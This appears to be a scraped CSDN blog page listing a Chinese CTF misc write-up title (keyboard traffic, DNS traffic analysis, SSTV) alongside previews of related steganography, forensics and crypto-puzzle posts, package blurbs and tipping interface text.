津门杯-m0_01 【键盘流量|云影密码(01248)】津门杯2021-m1 【StegSolve提取字符串】津门杯-tunnel 【DNS流量分析|文件提取|base64隐写】江苏工匠杯-来自银河的信号 【sstv慢速扫描|栅栏密码】
CTF中的无线电以及一些取证题目
m0re's blog
01-11 2877
前言 好久没发博客了,我的GitHub搭建的博客主题改好了,也就不改了, 以后慢慢转到我的个人博客上面了,CSDN很少发了。可能会不定时发一些。 之前打的比赛,看了眼还有附件,于是就找一下wp并复现了一遍。 这个比赛我记得当时好像就web签到成功了,然后就没有然后了。 无线电 roarCTF 无线电的知识点——https://md.byr.moe/s/Bk6tsb2O8 Hi_433MHz 附件给的是扩展名为s8的文件,它是音频的原始数据。所以在给audacity中导入时,需要选择导入原始数据 打开在中间
隐写术简论——ctf公开课笔记记录
m0_75196987的博客
04-14 591
misc隐写术——笔记整理。来自 长空实验室ctf新兵训练营。不建议广泛传播。
CTFmisc常见音频隐写总结
热门推荐
wha1e的博客
03-15 2万+
CTFmisc常见音频隐写
攻防世界Crypto、Broadcast、Morse、Caesar、base64
Welcome To Myon'Blog !
12-18 1536
攻防世界 Crypto Broadcast Morse Caesar base64
Python库 | scikit-misc-0.1.1.tar.gz
03-10
**Python库scikit-misc-0.1.1.tar.gz详解** 在Python的世界里,库是程序员们构建复杂应用的基础,它们提供了丰富的功能,减少了重复劳动。`scikit-misc`是一个这样的库,专为Python开发人员设计,旨在提供一些在...
xorg-x11-fonts-misc-7.5-33.el9.noarch
07-04
xorg-x11-fonts-misc-7.5-33.el9.noarch
lucene-misc-6.6.0-API文档-中文版.zip
05-02
赠送jar包:lucene-misc-6.6.0.jar; 赠送原API文档:lucene-misc-6.6.0-javadoc.jar; 赠送源代码:lucene-misc-6.6.0-sources.jar; 赠送Maven依赖信息文件:lucene-misc-6.6.0.pom; 包含翻译后的API文档:lucene...
BUUCTF | [UTCTF2020]sstv
pone2233的博客
02-22 2391
BUUCTF | [UTCTF2020]sstv 慢扫描电视(SSTV) 慢扫描电视(Slow-scan television)是业余无线电爱好者的一种主要图片传输方法,慢扫描电视通过无线电传输和接收单色或彩色静态图片。 慢扫描电视的一个术语名称是窄带电视。广播电视需要6MHz的带宽,因为帧速为25到30fps。慢扫描电视的带宽只有3kHz,因此慢扫描电视是一种慢得多的静态图像传输方法,通常每帧需要持续8秒或若干分钟。 业余无线电操作员通常在短波(或高频)、甚高频、超高频波段使用慢扫描电视。 开始解题 我们
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 9173
BUUCTF题目Misc部分wp(持续更新)
BUUCTF MISC刷题笔记(五)
volcano的博客
05-10 3868
BUUOJMisc[MRCTF2020]摇滚DJ(建议大声播放 Misc [MRCTF2020]摇滚DJ(建议大声播放
NKCTF 2023-misc全解(有脚本,有详解)
路baby的博客
03-29 3634
前几天打了nkctf ,因为自己也是主打misc,顺便也复现一遍,一点自己的拙见,各位师傅见笑了
对XYctf的一些总结
LS_Sy的博客
05-06 1037
此次比赛中出现的:X-Forwarded-For/Client-ip:修改来源ipvia:修改代理服务器还有一些常见的字段:GET:此方法用于请求指定的资源。GET请求应该安全且幂等,即多次执行相同的GET请求应该产生相同的结果。POST:此方法用于向指定的资源提交数据,以便根据所提供的数据创建/更新资源。POST请求不是幂等的,每次执行相同的POST请求可能会产生不同的结果。User-Agent:此头部字段提供了关于发送请求的应用程序或用户代理的信息。
来玩个游戏吧
SOSP_LM的博客
03-26 1256
前言 长时间没学习了,刚刚搭建好博客,先随便写一篇记录一下。 一道misc 来源:安恒杯2月线上赛 下载附件 题目说明: 学信息安全的朋友给你发来一封邮件,是一个小程序,有两个关卡,只要你通过这两个关卡,就会收到一封邮件。 但是这封邮件对于一般人的话会当做垃圾邮件处理,但是你知道,朋友所要描述的信息就在这封垃圾邮件当中。 邮件内容是普通的信息,但是你知道绝密消息(flag)就隐藏在其中,需要一个...
CTF中Crypto大全(还在更新)
m0_73100250的博客
09-10 1280
一、普通密码解码大全一、普通密码解码大全。
BUUCTF:[UTCTF2020]sstv
末初的CSDN博客
11-21 4486
https://buuoj.cn/challenges#[UTCTF2020]sstv attachment.wav Kali安装QSSTV apt-get install qsstv Options->Configuration->Sound勾选From file 然后点击这个小按钮,选择attachment.wav开始解码 flag{6bdfeac1e2baa12d6ac5384cdfd166b0} ...
2020 CTF暑假夏令营培训Day1 安全杂项Misc
小哈里的博客
08-14 975
Day1安全杂项 WSL安装 程序和功能-启动windows功能-WSL win商店-ubuntu安装 file命令,查看文件格式 ubuntu账户:gwj12345,repeat Kali Linux账户:gwj12345,repeat 工具: 01编辑器(主要),Archpr(暴力开压缩包),AuDaCity(查看音频文件),JDK(JAVA运行环境),mp3SteGo(音频隐写),StegSolve(图片隐写),Wireshark(流量分析) 隐藏数据,文件拼接:copy /b 1.png+1.
xorg-x11-fonts-misc 依赖包
10-23
xorg-x11-fonts-misc是一个Linux操作系统中的一个软件包,它是X Window系统中的一个字体集合。字体是指用于显示文本的图形符号集合。在图形界面中,字体的选择和使用对于用户界面的美观度和易读性是非常重要的。 xorg-x11-fonts-misc包含了一系列不同类型和样式的字体。这些字体可以用于显示各种文本内容,包括图标、标题、按钮、菜单等。这些字体集合的目的是为了满足用户对于不同风格和需求的文本显示的要求。 在安装xorg-x11-fonts-misc软件包时,可能会发现它有一些依赖包。所谓依赖包,是指在安装或运行特定软件时所必需的其他软件包。xorg-x11-fonts-misc的依赖包可能是其他字体软件包或X Window相关的软件包。 有了这些依赖包的支持,xorg-x11-fonts-misc软件包才能够正常安装和运行,并提供所需的字体功能,以确保图形界面的文字显示质量。因此,当安装xorg-x11-fonts-misc包时,系统会自动安装它所依赖的其他软件包。 总结来说,xorg-x11-fonts-misc是一个重要的字体集合,用于在Linux操作系统中提供丰富的文本显示功能。它依赖于其他相关软件包的支持,以保证字体的正常安装和使用。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Myon⁶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值